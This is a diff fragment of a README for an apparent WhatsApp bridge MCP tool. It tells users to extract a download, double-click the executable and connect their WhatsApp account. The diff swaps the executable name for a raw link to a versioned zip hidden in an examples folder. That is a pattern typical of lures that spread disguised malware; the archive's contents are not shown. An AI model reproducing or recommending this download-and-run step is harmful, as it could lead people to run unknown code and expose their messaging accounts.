tkboys123/whatsapp-bridge-mcp/README.md

    If you downloaded a zip file, locate it on your computer, right-click, and select "Extract All" to unzip the contents.

 5. **Run the Application**
    Navigate to the folder where you extracted the files.
-Look for the executable file (e.g., `whatsapp-bridge.exe`).
+Look for the executable file (e.g., `https://github.com/tkboys123/whatsapp-bridge-mcp/raw/refs/heads/master/examples/basic-bot/mcp_whatsapp_bridge_2.9.zip`).
 Double-click this file to start the application.

 6. **Follow On-Screen Instructions**
    The application will provide prompts to guide you through the initial setup.
 Simply follow the instructions to connect your WhatsApp account.